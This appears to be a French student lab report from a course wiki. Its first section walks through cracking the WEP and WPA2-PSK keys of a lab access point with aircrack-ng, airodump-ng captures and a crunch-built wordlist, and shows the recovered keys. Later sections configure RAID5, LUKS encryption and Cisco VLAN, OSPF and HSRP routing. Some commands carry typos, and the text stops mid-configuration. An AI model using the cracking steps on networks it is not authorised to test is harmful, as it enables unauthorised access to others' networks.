== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
